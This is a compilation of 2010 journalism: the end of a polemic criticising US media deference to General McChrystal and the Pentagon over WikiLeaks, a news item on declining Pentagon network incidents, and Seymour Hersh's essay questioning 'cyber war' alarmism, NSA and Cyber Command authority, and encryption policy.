It seems Burns wrote that while standing and saluting in front of a large wall photograph of the General, or perhaps kneeling in front of it. The only hint of a criticism was quite backhanded: that McCrystal "blundered catastrophically" by failing to exercise sufficient caution when speaking to an Unestablished, Unaccepted, reckless, low-level loser like Michael Hastings, who simply did not know -- or refused to abide by -- the General-protecting rules that Real Reporters use when venerating covering for covering top military officials. And despite writing 2,700 praise-filled words about McChrystal, Burns never once mentioned little things like his central involvement in the Pat Tillman fraud or the widespread detainee abuse in Iraq under his command, until a reader asked about it, and only then, he mentioned it in passing to dismiss it. Burns' view of McChrystal is the very definition of journalistic hagiography.

Or consider this NYT profile of Gen. McChrystal by Elisabeth Bumiller and Mark Mazzetti, after he was named to run the war in Afghanistan, that was more creepily worshipful than any Us Weekly profile of a movie star whose baby pictures they are desperate to publish. It goes on and on with drooling praise, but this is how it begins:

Lt. Gen. Stanley A. McChrystal, the ascetic who is set to become the new top American commander in Afghanistan, usually eats just one meal a day, in the evening, to avoid sluggishness.

He is known for operating on a few hours’ sleep and for running to and from work while listening to audio books on an iPod. In Iraq, where he oversaw secret commando operations for five years, former intelligence officials say that he had an encyclopedic, even obsessive, knowledge about the lives of terrorists, and that he pushed his ranks aggressively to kill as many of them as possible.

But General McChrystal has also moved easily from the dark world to the light. Fellow officers on the Joint Chiefs of Staff, where he is director, and former colleagues at the Council on Foreign Relations describe him as a warrior-scholar, comfortable with diplomats, politicians and the military man who would help promote him to his new job.

"He's lanky, smart, tough, a sneaky stealth soldier," said Maj. Gen. William Nash, a retired officer. "He’s got all the Special Ops attributes, plus an intellect."
That article also never mentioned the issue of detainee abuse -- no need to bother NYT readers with such unpleasantries about the Lanky Smart Tough Warrior who will win Afghanistan -- while the Tillman incident was buried in a paragraph near the end and dismissed as the "one blot on his otherwise impressive military record." Remember, though: "the Times is 'not in the business of hagiography'." Upon McChrystal's firing, the Hillman Foundation's Charles Kaiser wrote a comprehensive piece documenting how the "unspoken rules" cited by Burns to attack Hastings were what led to widespread media protection and veneration of McChrystal, as embodied by the highly revealing though pernicious comments from CBS News' Lara Logan ("Michael Hastings has never served his country the way McChrystal has").

"Hagiography" is exactly what the American establishment media does, when it comes to powerful American political and military leaders. Slimy, personality-based hit pieces are reserved for those who are scorned by the powerful in Washington -- such as Julian Assange. So subservient to the Pentagon's agenda was the media coverage of the WikiLeaked documents that even former high-level journalists are emphatically objecting, and naming names. John Parker, former military reporter and fellow of the University of Maryland Knight Center for Specialized Journalism-Military Reporting, wrote an extraordinarily good letter yesterday:

The sad lack of coverage ("Sunday talk shows largely ignore WikiLeaks' Iraq files") of the leak of unfiltered, publicly owned information from the latest WikiLeak is disturbing, but not historically out of the ordinary for major American media.

The career trend of too many Pentagon journalists typically arrives at the same vanishing point: Over time they are co-opted by a combination of awe -- interacting so closely with the most powerfully romanticized force of violence in the history of humanity -- and the admirable and seductive allure of the sharp, amazingly focused demeanor of highly trained military minds. Top military officers have their s*** together and it's personally humbling for reporters who've never served to witness that kind of impeccable competence. These unspoken factors, not to mention the inner pull of reporters' innate patriotism, have lured otherwise smart journalists to abandon – justifiably in their minds – their professional obligation to treat all sources equally and skeptically.

Too many military reporters in the online/broadcast field have simply given up their watchdog role for the illusion of being a part of power. Example No. 1 of late is Tom Gjelten of NPR. . . Interviewed by his colleague on Oct. 22 about the latest WikiLeaks documents, this exchange happened:


Robert Siegel: And reaction to the release today?

Gjelten: Well, the Pentagon is, understandably, very angry, as they were when the documents from Afghanistan were released. They said this decision to release them was made cavalierly. They do point out - and I can't say I disagree (emphasis Parker's) - that the period in Iraq that these documents covered was already very well chronicled. They say it does not bring new understanding to those events.


There it is in black and white. Gjelten is lending his credibility to the Pentagon as "neutral" national journalist. . . . Gjelten, other Pentagon journalists and informed members of the public would benefit from watching "The Selling of the Pentagon," a 1971 documentary. It details how, in the height of the Vietnam War, the Pentagon sophisticatedly used taxpayer money against taxpayers in an effort to sway their opinions toward the Pentagon’s desires for unlimited war. Forty years later, the techniques of shaping public opinion via media has evolved exponentially. It has reached the point where flipping major journalists is a matter of painting in their personal numbers.
Precisely. The Pentagon has long been devoted to destroying the credibility and reputation of WikiLeaks, and the military-revering John Burns and his war-enabling newspaper, as usual, lent its helping hand to the Government's agenda. This is what NPR's Gjelten routinely does as well. The Pulitzer-Prize-winning David Cay Johnston, formerly of the NYT, wrote his own letter yesterday supporting Parker, citing the media's Pentagon-parroting line (from Gjelten and others) that there is nothing new in the WikiLeaks documents, and wrote: "If you want to ignore the facts or tell only the official version of events get a job as a flack." That is the job they have, only they're employed by our major media outlets. That's the principal problem. They receive most of their benefits -- their access, their scoops, their sense of belonging, their money, their esteem -- from dutifully serving that role.

Of course, another major reason why these media figures are so eager to parrot the Government line -- to try to destroy Assange and insist that there's "nothing new" in these horrifying documents -- is because they cheered for these wars in the first place. The Washington Post's Editorial Page Editor, Fred Hiatt, was one of the most vocal cheerleaders for the attack on Iraq, and so predictably, the Post (like NPR's Gjelten) ran an Editorial yesterday echoing the Pentagon and belittling the WikiLeaks documents as Nothing New Here. If that's true, perhaps Hiatt can point to the article where the Post previously reported on the existence of Frago 242, the secret order which instructed American troops not to investigate Iraqi abuse, or perhaps he can explain why the Post's own Baghdad Bureau Chief for much of the war, Ellen Knickmeyer, finds plenty new in the WikiLeaks documents: "Thanks to WikiLeaks, though, I now know the extent to which top American leaders lied, knowingly, to the American public, to American troops, and to the world, as the Iraq mission exploded."

Media figures like Burns, Gjelten, Hiatt and the NYT want you to think there's nothing new in these documents, and to focus instead on Julian Assange's alleged personality flaws (or the prospects that he -- rather than the criminals he exposed -- should be prosecuted), because that way they hope you won't notice all the blood on their hands. That's one major benefit. The other is that they discharge their prime function of currying favor with and serving the interests of the powerful Washington figures whom "cover."

* * * * *

There's one specific inaccuracy in Burns' response to me which I want to highlight. The Yahoo! article states: "Burns took issue with Greenwald's suggestion that he's 'a borderline-sociopath' who's now coping with the guilt of having 'enabled and cheered' on the Iraq war." I didn't actually call Burns that. What I wrote was that, in light of what these documents reveal, "even" a borderline-sociopath would be awash with guilt over having supported this war and would be eager to distract attention away from that -- by belittling the importance of the documents and focusing instead on the messenger: Julian Assange. In other words, there's only one category of people who would not feel such guilt -- an absolute sociopath -- and I was generously assuming that Burns was not in that category, which is why I would expect (and hope) that he is driven by guilt over the war he supported. That's the most generous explanation I can think of for why -- in the face of these startling, historic revelations -- his journalistic choice was to pass on personality chatter about Assange.

UPDATE: The New York Times offered a feature today -- "Ask The New York Times" -- where readers can ask questions of the various reporters who worked on the WikiLeaks story. The first two questions were about the criticisms I've voiced about that coverage over the last few days (or at least the first question was: about my critique of the substance of the NYT's coverage); the second question was merely a general one about the reasons why the NYT published the "hit piece" on Julian Assange, and Burns answered and took that opportunity to "address" my criticisms specifically.

I don't have much to add to what either reporter said there, as I think my critiques stand on their own, and I've already addressed most of the excuses offered. I will, however, note two points: (1) one the cheapest, most slothful and most intellectually dishonest methods for refuting an argument is to mockingly slap the label of "conspiracy theory" on it, as though the argument then becomes self-refuting; that's virtually always a non-responsive strawman, and that's exactly what Burns does in purporting to address my criticisms even though, manifestly, nothing I said qualifies as such; and (2) it's a very significant -- and positive -- change even from a couple of years ago that these reporters are not only loudly exposed to criticisms of their work, but feel compelled to expend substantial efforts engaging them and responding.

As for John Burns' overarching mentality, consider what he said on PBS' News Hour in July, after Gen. McChrystal had been fired, about the lesson that should be learned from that episode: "I think we in the press have to really look at cases like this and say, to what extent can we change the way we behave in such a way that this sort of thing doesn't happen again?" If an Important and Great Man like Gen. McChrystal ends up negatively affected as a result of truths uncovered by a real journalist (Michael Hastings), then -- sayeth John Burns -- the media must change its behavior, for that is the opposite of what it ought to be doing.

Despite Scare Talk, Attacks on Pentagon Networks Drop
Noah Shachtman

Listen to the generals speak, and you’d think the Pentagon’s networks were about to be overrun with worms and Trojans. But a draft federal report indicates that the number of “incidents of malicious cyber activity” in the Defense Department has actually decreased in 2010. It’s the first such decline since the turn of the millennium.

In the first six months of 2010, there were about 30,000 such incidents, according to statistics compiled by the U.S.-China Economic and Security Review Commission. Last year, there were more than 71,000. “If the rate of malicious activity from the first half of this year continues through the end of the year,” the commission notes in a draft report on China and the internet, “2010 could be the first year in a decade in which the quantity of logged events declines.”

The figures are in stark contrast to the sky-is-falling talk coming out of the Beltway.

“Over the past ten years, the frequency and sophistication of intrusions into U.S.military networks have increased exponentially,” Deputy Defense Secretary William Lynn wrote in a recent issue of Foreign Affairs.

In his April Senate Armed Services Committee confirmation hearing, U.S. Cyber Command and National Security Agency chief Lt. Gen. Keith Alexander said he was “alarmed by the increase, especially this year” in the number of attempts to scan military networks for potential vulnerabilities. His NSA predecessor, retired Adm. Mike McConnell, took things three steps further, writing: “the United States is fighting a cyber-war today, and we are losing.”

The report cautioned that the drop in “malicious activity … may or may not represent a decrease in the volume of attempts to penetrate defense and military networks.” Instead, the Pentagon seems to be doing a little better job in securing its networks, ever since a relatively-unsophisticated worm made its way onto hundreds of thousands of military computers in late 2008.

During “Operation Buckshot Yankee,” the subsequent clean-up effort, military leaders found that they were unable to gather even the most basic information about how their computers were configured — and what programs might be living in their networks.

In response, implementation of a new, Host-Based Security System was accelerated, for better threat detection. Information security training and patch updates are mandatory. And there’s now a Cyber Command responsible for coordinating threat monitoring, network defense and information attack. Leaders now have “greater visibility of threat activity, vulnerability, and ultimately risk” into network threats, the report says. “Greater resources, enhanced perimeter defenses, and the establishment of U.S. Cyber Command” have all helped, as well.

Does that mean the Pentagon is suddenly safe from hack attacks? Of course not. Could some adversaries be on the process of trading malware quantity for malware quality? Of course they could. But, at least in this most basic of measures, there are indications that the threat to Defense Department networks may not be quite as overwhelming and unstoppable as some in the military brass have lead us to believe.

Should We be Worried About a Cyber War?
Seymour M. Hersh

On April 1, 2001, an American EP-3E Aries II reconnaissance plane on an eavesdropping mission collided with a Chinese interceptor jet over the South China Sea, triggering the first international crisis of George W. Bush’s Administration. The Chinese jet crashed, and its pilot was killed, but the pilot of the American aircraft, Navy Lieutenant Shane Osborn, managed to make an emergency landing at a Chinese F-8 fighter base on Hainan Island, fifteen miles from the mainland. Osborn later published a memoir, in which he described the “incessant jackhammer vibration” as the plane fell eight thousand feet in thirty seconds, before he regained control.

The plane carried twenty-four officers and enlisted men and women attached to the Naval Security Group Command, a field component of the National Security Agency. They were repatriated after eleven days; the plane stayed behind. The Pentagon told the press that the crew had followed its protocol, which called for the use of a fire axe, and even hot coffee, to disable the plane’s equipment and software. These included an operating system created and controlled by the N.S.A., and the drivers needed to monitor encrypted Chinese radar, voice, and electronic communications. It was more than two years before the Navy acknowledged that things had not gone so well. “Compromise by the People’s Republic of China of undestroyed classified material . . . is highly probable and cannot be ruled out,” a Navy report issued in September, 2003, said.

The loss was even more devastating than the 2003 report suggested, and its dimensions have still not been fully revealed. Retired Rear Admiral Eric McVadon, who flew patrols off the coast of Russia and served as a defense attaché in Beijing, told me that the radio reports from the aircraft indicated that essential electronic gear had been dealt with. He said that the crew of the EP-3E managed to erase the hard drive—“zeroed it out”—but did not destroy the hardware, which left data retrievable: “No one took a hammer.” Worse, the electronics had recently been upgraded. “Some might think it would not turn out as badly as it did, but I sat in some meetings about the intelligence cost,” McVadon said. “It was grim.”

The Navy’s experts didn’t believe that China was capable of reverse-engineering the plane’s N.S.A.-supplied operating system, estimated at between thirty and fifty million lines of computer code, according to a former senior intelligence official. Mastering it would give China a road map for decrypting the Navy’s classified intelligence and operational data. “If the operating system was controlling what you’d expect on an intelligence aircraft, it would have a bunch of drivers to capture radar and telemetry,” Whitfield Diffie, a pioneer in the field of encryption, said. “The plane was configured for what it wants to snoop, and the Chinese would want to know what we wanted to know about them—what we could intercept and they could not.” And over the next few years the U.S. intelligence community began to “read the tells” that China had access to sensitive traffic.

The U.S. realized the extent of its exposure only in late 2008. A few weeks after Barack Obama’s election, the Chinese began flooding a group of communications links known to be monitored by the N.S.A. with a barrage of intercepts, two Bush Administration national-security officials and the former senior intelligence official told me. The intercepts included details of planned American naval movements. The Chinese were apparently showing the U.S. their hand. (“The N.S.A. would ask, ‘Can the Chinese be that good?’ ” the former official told me. “My response was that they only invented gunpowder in the tenth century and built the bomb in 1965. I’d say, ‘Can you read Chinese?’ We don’t even know the Chinese pictograph for ‘Happy hour.’ ”)

Why would the Chinese reveal that they had access to American communications? One of the Bush national-security officials told me that some of the aides then working for Vice-President Dick Cheney believed—or wanted to believe—that the barrage was meant as a welcome to President Obama. It is also possible that the Chinese simply made a mistake, given the difficulty of operating surgically in the cyber world.

Admiral Timothy J. Keating, who was then the head of the Pacific Command, convened a series of frantic meetings in Hawaii, according to a former C.I.A. official. In early 2009, Keating brought the issue to the new Obama Administration. If China had reverse-engineered the EP-3E’s operating system, all such systems in the Navy would have to be replaced, at a cost of hundreds of millions of dollars. After much discussion, several current and former officials said, this was done. (The Navy did not respond to a request for comment on the incident.)

Admiral McVadon said that the loss prompted some black humor, with one Navy program officer quoted as saying, “This is one hell of a way to go about getting a new operating system.”

The EP-3E debacle fuelled a longstanding debate within the military and in the Obama Administration. Many military leaders view the Chinese penetration as a warning about present and future vulnerabilities—about the possibility that China, or some other nation, could use its expanding cyber skills to attack America’s civilian infrastructure and military complex. On the other side are those who argue for a civilian response to the threat, focussed on a wider use of encryption. They fear that an overreliance on the military will have adverse consequences for privacy and civil liberties.

In May, after years of planning, the U.S. Cyber Command was officially activated, and took operational control of disparate cyber-security and attack units that had been scattered among the four military services. Its commander, Army General Keith Alexander, a career intelligence officer, has made it clear that he wants more access to e-mail, social networks, and the Internet to protect America and fight in what he sees as a new warfare domain—cyberspace. In the next few months, President Obama, who has publicly pledged that his Administration will protect openness and privacy on the Internet, will have to make choices that will have enormous consequences for the future of an ever-growing maze of new communication techniques: Will America’s networks be entrusted to civilians or to the military? Will cyber security be treated as a kind of war?

Even as the full story of China’s EP-3E coup remained hidden, “cyber war” was emerging as one of the nation’s most widely publicized national-security concerns. Early this year, Richard Clarke, a former White House national-security aide who warned about the threat from Al Qaeda before the September 11th attacks, published “Cyber War,” an edgy account of America’s vulnerability to hackers, both state-sponsored and individual, especially from China. “Since the late 1990s, China has systematically done all the things a nation would do if it contemplated having an offensive cyber war capability,” Clarke wrote. He forecast a world in which China might unleash havoc:

Within a quarter of an hour, 157 major metropolitan areas have been thrown into knots by a nationwide power blackout hitting during rush hour. Poison gas clouds are wafting toward Wilmington and Houston. Refineries are burning up oil supplies in several cities. Subways have crashed in New York, Oakland, Washington, and Los Angeles. . . . Aircraft are literally falling out of the sky as a result of midair collisions across the country. . . . Several thousand Americans have already died.

Retired Vice-Admiral J. Michael McConnell, Bush’s second director of National Intelligence, has issued similar warnings. “The United States is fighting a cyber war today, and we are losing,” McConnell wrote earlier this year in the Washington Post. “Our cyber-defenses are woefully lacking.” In February, in testimony before the Senate Commerce, Science, and Transportation Committee, he said, “As a consequence of not mitigating the risk, we’re going to have a catastrophic event.”

A great deal of money is at stake. Cyber security is a major growth industry, and warnings from Clarke, McConnell, and others have helped to create what has become a military-cyber complex. The federal government currently spends between six and seven billion dollars annually for unclassified cyber-security work, and, it is estimated, an equal amount on the classified portion. In July, the Washington Post published a critical assessment of the unchecked growth of government intelligence agencies and private contractors. Benjamin Powell, who served as general counsel for three directors of the Office of National Intelligence, was quoted as saying of the cyber-security sector, “Sometimes there was an unfortunate attitude of bring your knives, your guns, your fists, and be fully prepared to defend your turf. . . . Because it’s funded, it’s hot and it’s sexy.”

Clarke is the chairman of Good Harbor Consulting, a strategic-planning firm that advises governments and companies on cyber security and other issues. (He says that more than ninety per cent of his company’s revenue comes from non-cyber-related work.) McConnell is now an executive vice-president of Booz Allen Hamilton, a major defense contractor. Two months after McConnell testified before the Senate, Booz Allen Hamilton landed a thirty-four-million-dollar cyber contract. It included fourteen million dollars to build a bunker for the Pentagon’s new Cyber Command.

American intelligence and security officials for the most part agree that the Chinese military, or, for that matter, an independent hacker, is theoretically capable of creating a degree of chaos inside America. But I was told by military, technical, and intelligence experts that these fears have been exaggerated, and are based on a fundamental confusion between cyber espionage and cyber war. Cyber espionage is the science of covertly capturing e-mail traffic, text messages, other electronic communications, and corporate data for the purpose of gathering national-security or commercial intelligence. Cyber war involves the penetration of foreign networks for the purpose of disrupting or dismantling those networks, and making them inoperable. (Some of those I spoke to made the point that China had demonstrated its mastery of cyber espionage in the EP-3E incident, but it did not make overt use of it to wage cyber war.) Blurring the distinction between cyber war and cyber espionage has been profitable for defense contractors—and dispiriting for privacy advocates.

Clarke’s book, with its alarming vignettes, was praised by many reviewers. But it received much harsher treatment from writers in the technical press, who pointed out factual errors and faulty assumptions. For example, Clarke attributed a severe power outage in Brazil to a hacker; the evidence pointed to sooty insulators.

The most common cyber-war scare scenarios involve America’s electrical grid. Even the most vigorous privacy advocate would not dispute the need to improve the safety of the power infrastructure, but there is no documented case of an electrical shutdown forced by a cyber attack. And the cartoonish view that a hacker pressing a button could cause the lights to go out across the country is simply wrong. There is no national power grid in the United States. There are more than a hundred publicly and privately owned power companies that operate their own lines, with separate computer systems and separate security arrangements. The companies have formed many regional grids, which means that an electrical supplier that found itself under cyber attack would be able to avail itself of power from nearby systems. Decentralization, which alarms security experts like Clarke and many in the military, can also protect networks.

In July, there were reports that a computer worm, known as Stuxnet, had infected thousands of computers worldwide. Victims, most of whom were unharmed, were able to overcome the attacks, although it sometimes took hours or days to even notice them. Some of the computers were inside the Bushehr nuclear-energy plant, in Iran, and this led to speculation that Israel or the United States might have developed the virus. A Pentagon adviser on information warfare told me that it could have been an attempted “semantic attack,” in which the virus or worm is designed to fool its victim into thinking that its computer systems are functioning properly, when in fact they are not, and may not have been for some time. (This month, Microsoft, whose Windows operating systems were the main target of Stuxnet, completed a lengthy security fix, or patch.)

If Stuxnet was aimed specifically at Bushehr, it exhibited one of the weaknesses of cyber attacks: they are difficult to target and also to contain. India and China were both hit harder than Iran, and the virus could easily have spread in a different direction, and hit Israel itself. Again, the very openness of the Internet serves as a deterrent against the use of cyber weapons.

Bruce Schneier, a computer scientist who publishes a widely read blog on cyber security, told me that he didn’t know whether Stuxnet posed a new threat. “There’s certainly no actual evidence that the worm is targeted against Iran or anybody,” he said in an e-mail. “On the other hand, it’s very well designed and well written.” The real hazard of Stuxnet, he added, might be that it was “great for those who want to believe cyber war is here. It is going to be harder than ever to hold off the military.”

A defense contractor who is regarded as one of America’s most knowledgeable experts on Chinese military and cyber capabilities took exception to the phrase “cyber war.” “Yes, the Chinese would love to stick it to us,” the contractor told me. “They would love to transfer economic and business innovation from West to East. But cyber espionage is not cyber war.” He added, “People have been sloppy in their language. McConnell and Clarke have been pushing cyber war, but their evidentiary basis is weak.”

James Lewis, a senior fellow at the Center for Strategic and International Studies, who worked for the Departments of State and Commerce in the Clinton Administration, has written extensively on the huge economic costs due to cyber espionage from China and other countries, like Russia, whose hackers are closely linked to organized crime. Lewis, too, made a distinction between this and cyber war: “Current Chinese officials have told me that we’re not going to attack Wall Street, because we basically own it”—a reference to China’s holdings of nearly a trillion dollars in American securities—“and a cyber-war attack would do as much economic harm to us as to you.”

Nonetheless, China “is in full economic attack” inside the United States, Lewis says. “Some of it is economic espionage that we know and understand. Some of it is like the Wild West. Everybody is pirating from everybody else. The U.S.’s problem is what to do about it. I believe we have to begin by thinking about it”—the Chinese cyber threat—“as a trade issue that we have not dealt with.”

The bureaucratic battle between the military and civilian agencies over cyber security—and the budget that comes with it—has made threat assessments more problematic. General Alexander, the head of Cyber Command, is also the director of the N.S.A., a double role that has caused some apprehension, particularly on the part of privacy advocates and civil libertarians. (The N.S.A. is formally part of the Department of Defense.) One of Alexander’s first goals was to make sure that the military would take the lead role in cyber security and in determining the future shape of computer networks. (A Department of Defense spokesman, in response to a request to comment on this story, said that the department “continues to adhere to all laws, policies, directives, or regulations regarding cyberspace. The Department of Defense maintains strong commitments to protecting civil liberties and privacy.”)

The Department of Homeland Security has nominal responsibility for the safety of America’s civilian and private infrastructure, but the military leadership believes that the D.H.S. does not have the resources to protect the electrical grids and other networks. (The department intends to hire a thousand more cyber-security staff members over the next three years.) This dispute became public when, in March, 2009, Rodney Beckstrom, the director of the D.H.S.’s National Cybersecurity Center, abruptly resigned. In a letter to Secretary Janet Napolitano, Beckstrom warned that the N.S.A. was effectively controlling her department’s cyber operations: “While acknowledging the critical importance of N.S.A. to our intelligence efforts . . . the threats to our democratic processes are significant if all top level government network security and monitoring are handled by any one organization.” Beckstrom added that he had argued for civilian control of cyber security, “which interfaces with, but is not controlled by, the N.S.A.”

General Alexander has done little to reassure critics about the N.S.A.’s growing role. In the public portion of his confirmation hearing, in April, before the Senate Armed Services Committee, he complained of a “mismatch between our technical capabilities to conduct operations and the governing laws and policies.”

Alexander later addressed a controversial area: when to use conventional armed forces to respond to, or even preëmpt, a network attack. He told the senators that one problem for Cyber Command would be to formulate a response based on nothing more than a rough judgment about a hacker’s intent. “What’s his game plan? Does he have one?” he said. “These are tough issues, especially when attribution and neutrality are brought in, and when trying to figure out what’s come in.” At this point, he said, he did not have “the authority . . . to reach out into a neutral country and do an attack. And therein lies the complication. . . . What do you do to take that second step?”

Making the same argument, William J. Lynn III, the Deputy Secretary of Defense, published an essay this fall in Foreign Affairs in which he wrote of applying the N.S.A.’s “defense capabilities beyond the ‘.gov’ domain,” and asserted, “As a doctrinal matter, the Pentagon has formally recognized cyberspace as a new domain of warfare.” This definition raises questions about where the battlefield begins and where it ends. If the military is operating in “cyberspace,” does that include civilian computers in American homes?

Lynn also alluded to a previously classified incident, in 2008, in which some N.S.A. unit commanders, facing penetration of their bases’ secure networks, concluded that the break-in was caused by a disabling thumb drive; Lynn said that it had been corrupted by “a foreign intelligence agency.” (According to press reports, the program was just as likely to be the product of hackers as that of a government.) Lynn termed it a “wakeup call” and a “turning point in U.S. cyber defense strategy.” He compared the present moment to the day in 1939 when President Franklin D. Roosevelt got a letter from Albert Einstein about the possibility of atomic warfare.

But Lynn didn’t mention one key element in the commanders’ response: they ordered all ports on the computers on their bases to be sealed with liquid cement. Such a demand would be a tough sell in the civilian realm. (And a Pentagon adviser suggested that many military computer operators had simply ignored the order.)

A senior official in the Department of Homeland Security told me, “Every time the N.S.A. gets involved in domestic security, there’s a hue and cry from people in the privacy world.” He said, though, that coöperation between the military and civilians had increased. (The Department of Homeland Security recently signed a memorandum with the Pentagon that gives the military authority to operate inside the United States in case of cyber attack.) “We need the N.S.A., but the question we have is how to work with them and still say and demonstrate that we are in charge in the areas for which we are responsible.”

This official, like many I spoke to, portrayed the talk about cyber war as a bureaucratic effort “to raise the alarm” and garner support for an increased Defense Department role in the protection of private infrastructure. He said, “You hear about cyber war all over town. This”—he mentioned statements by Clarke and others—“is being done to mobilize a political effort. We always turn to war analogies to mobilize the people.”

In theory, the fight over whether the Pentagon or civilian agencies should be in charge of cyber security should be mediated by President Obama’s coördinator for cyber security, Howard Schmidt—the cyber czar. But Schmidt has done little to assert his authority. He has no independent budget control and in a crisis would be at the mercy of those with more assets, such as General Alexander. He was not the Administration’s first choice for the cyber-czar job—reportedly, several people turned it down. The Pentagon adviser on information warfare, in an e-mail that described the lack of an over-all policy and the “cyber-pillage” of intellectual property, added the sort of dismissive comment that I heard from others: “It’s ironic that all this goes on under the nose of our first cyber President. . . . Maybe he should have picked a cyber czar with more than a mail-order degree.” (Schmidt’s bachelor’s and master’s degrees are from the University of Phoenix.)

Howard Schmidt doesn’t like the term “cyber war.” “The key point is that cyber war benefits no one,” Schmidt told me in an interview at the Old Executive Office Building. “We need to focus on that fact. When people tell me that these guys or this government is going to take down the U.S. military with information warfare I say that, if you look at the history of conflicts, there’s always been the goal of intercepting the communications of combatants—whether it’s cutting down telephone poles or intercepting Morse-code signalling. We have people now who have found that warning about ‘cyber war’ has become an unlikely career path”—an obvious reference to McConnell and Clarke. “All of a sudden, they have become experts, and they get a lot of attention. ‘War’ is a big word, and the media is responsible for pushing this, too. Economic espionage on the Internet has been mischaracterized by people as cyber war.”

Schmidt served in Vietnam, worked as a police officer for several years on a SWAT team in Arizona, and then specialized in computer-related crimes at the F.B.I. and in the Air Force’s investigative division. In 1997, he joined Microsoft, where he became chief of security, leaving after the 9/11 attacks to serve in the Bush Administration as a special adviser for cyber security. When Obama hired him, he was working as the head of security for eBay. When I asked him about the ongoing military-civilian dispute, Schmidt said, “The middle way is not to give too much authority to one group or another and to make sure that we share information with each other.”

Schmidt continued, “We have to protect our infrastructure and our way of life, for sure. We do have vulnerabilities, and we do talk about worst-case scenarios” with the Pentagon and the Department of Homeland Security. “You don’t see a looming war and just wait for it to come.” But, at the same time, “we have to keep our shipping lanes open, to continue to do commerce, and to freely use the Internet.”

How should the power grid be protected? It does remain far too easy for a sophisticated hacker to break into American networks. In 2008, the computers of both the Obama and the McCain campaigns were hacked. Suspicion fell on Chinese hackers. People routinely open e-mails with infected attachments, allowing hackers to “enslave” their computers. Such machines, known as zombies, can be linked to create a “botnet,” which can flood and effectively shut down a major system. Hackers are also capable of penetrating a major server, like Gmail. Guesses about the cost of cyber crime vary widely, but one survey, cited by President Obama in a speech in May, 2009, put the price at more than eight billion dollars in 2007 and 2008 combined. Obama added, referring to corporate cyber espionage, “It’s been estimated that last year alone cyber criminals stole intellectual property from businesses worldwide worth up to one trillion dollars.”

One solution is mandated encryption: the government would compel both corporations and individuals to install the most up-to-date protection tools. This option, in some form, has broad support in the technology community and among privacy advocates. In contrast, military and intelligence eavesdroppers have resisted nationwide encryption since 1976, when the Diffie-Hellman key exchange (an encryption tool co-developed by Whitfield Diffie) was invented, for the most obvious of reasons: it would hinder their ability to intercept signals. In this sense, the N.S.A.’s interests align with those of the hackers.

John Arquilla, who has taught since 1993 at the U.S. Naval Postgraduate School in Monterey, California, writes in his book “Worst Enemies,” “We would all be far better off if virtually all civil, commercial, governmental, and military internet and web traffic were strongly encrypted.” Instead, many of those charged with security have adopted the view that “cyberspace can be defended with virtual fortifications—basically the ‘firewalls’ that everyone knows about. . . . A kind of Maginot Line mentality prevails.”

Arquilla added that America’s intelligence agencies and law-enforcement officials have consistently resisted encryption because of fears that a serious, widespread effort to secure data would interfere with their ability to electronically monitor and track would-be criminals or international terrorists. This hasn’t stopped sophisticated wrongdoers from, say, hiring hackers or encrypting files; it just leaves the public exposed, Arquilla writes. “Today drug lords still enjoy secure internet and web communications, as do many in terror networks, while most Americans don’t.”

Schmidt told me that he supports mandated encryption for the nation’s power and electrical infrastructure, though not beyond that. But, early last year, President Obama declined to support such a mandate, in part, Schmidt said, because of the costs it would entail for corporations. In addition to the setup expenses, sophisticated encryption systems involve a reliance on security cards and on constantly changing passwords, along with increased demands on employees and a ceding of control by executives to their security teams.

General Alexander, meanwhile, has continued to press for more authority, and even for a separate Internet domain—another Maginot Line, perhaps. One morning in September, he told a group of journalists that the Cyber Command needed what he called “a secure zone,” a separate space within the Internet to shelter the military and essential industries from cyber attacks. The secure zone would be kept under tight government control. He also assured the journalists, according to the Times, that “we can protect civil liberties, privacy, and still do our mission.” The Week in Review is edited and published by Jack Spratts. The General was more skeptical about his ability to please privacy advocates when he testified, a few hours later, before the House Armed Services Committee: “A lot of people bring up privacy and civil liberties. And then you say, ‘Well, what specifically are you concerned about?’ And they say, ‘Well, privacy and civil liberties.’ . . . Are you concerned that the anti-virus program that McAfee runs invades your privacy or civil liberties?’ And the answer is ‘No, no, no—but I’m worried that you would.’ ”

This summer, the Wall Street Journal reported that the N.S.A. had begun financing a secret surveillance program called Perfect Citizen to monitor attempted intrusions into the computer networks of private power companies. The program calls for the installation of government sensors in those networks to watch for unusual activity. The Journal noted that some companies expressed concerns about privacy, and said that what they needed instead was better guidance on what to do in case of a major cyber attack. The N.S.A. issued a rare public response, insisting that there was no “monitoring activity” involved: “We strictly adhere to both the spirit and the letter of U.S. laws and regulations.”

A former N.S.A. operative I spoke to said, of Perfect Citizen, “This would put the N.S.A. into the job of being able to watch over our national communications grid. If it was all dot-gov, I would have no problem with the sensors, but what if the private companies rely on Gmail or att.net to communicate? This could put the N.S.A. into every service provider in the country.”

The N.S.A. has its own hackers. Many of them are based at a secret annex near Thurgood Marshall International Airport, outside Baltimore. (The airport used to be called Friendship Airport, and the annex is known to insiders as the FANX, for “Friendship annex.”) There teams of attackers seek to penetrate the communications of both friendly and unfriendly governments, and teams of defenders monitor penetrations and attempted penetrations of U.S. systems. The former N.S.A. operative, who served as a senior watch officer at a major covert installation, told me that the N.S.A. obtained invaluable on-the-job training in cyber espionage during the attack on Iraq in 1991. Its techniques were perfected during the struggle in Kosovo in 1999 and, later, against Al Qaeda in Iraq. “Whatever the Chinese can do to us, we can do better,” the technician said. “Our offensive cyber capabilities are far more advanced.”

Nonetheless, Marc Rotenberg, the president of the Electronic Privacy Information Center and a leading privacy advocate, argues that the N.S.A. is simply not competent enough to take a leadership role in cyber security. “Let’s put the issue of privacy of communications aside,” Rotenberg, a former Senate aide who has testified often before Congress on encryption policy and consumer protection, said. “The question is: Do you want an agency that spies with mixed success to be responsible for securing the nation’s security? If you do, that’s crazy.”

Nearly two decades ago, the Clinton Administration, under pressure from the N.S.A., said that it would permit encryption-equipped computers to be exported only if their American manufacturers agreed to install a government-approved chip, known as the Clipper Chip, in each one. It was subsequently revealed that the Clipper Chip would enable law-enforcement officials to have access to data in the computers. The ensuing privacy row embarrassed Clinton, and the encryption-equipped computers were permitted to be exported without the chip, in what amounted to a rebuke to the N.S.A.

That history may be repeating itself. The Obama Administration is now planning to seek broad new legislation that would enable national-security and law-enforcement officials to police online communications. The legislation, similar to that sought two decades ago in the Clipper Chip debate, would require manufacturers of equipment such as the BlackBerry, and all domestic and foreign purveyors of communications, such as Skype, to develop technology that would allow the federal government to intercept and decode traffic.

